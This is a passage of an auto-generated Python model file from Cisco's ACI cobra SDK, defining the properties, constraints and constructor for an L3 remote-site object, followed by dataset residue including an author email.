meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.l3.Inst")
meta.superClasses.add("cobra.model.pol.Instr")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.rnPrefixes = [
('lsite-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5581, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "etep", "etep", 33221, PropCategory.REGULAR)
prop.label = "ETEP IP"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("etep", prop)
prop = PropMeta("str", "id", "id", 33222, PropCategory.REGULAR)
prop.label = "Site ID"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("id", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
meta.namingProps.append(getattr(meta.props, "id"))
def __init__(self, parentMoOrDn, id, markDirty=True, **creationProps):
namingVals = [id]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"rrishike@cisco.com"
] |
rrishike@cisco.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.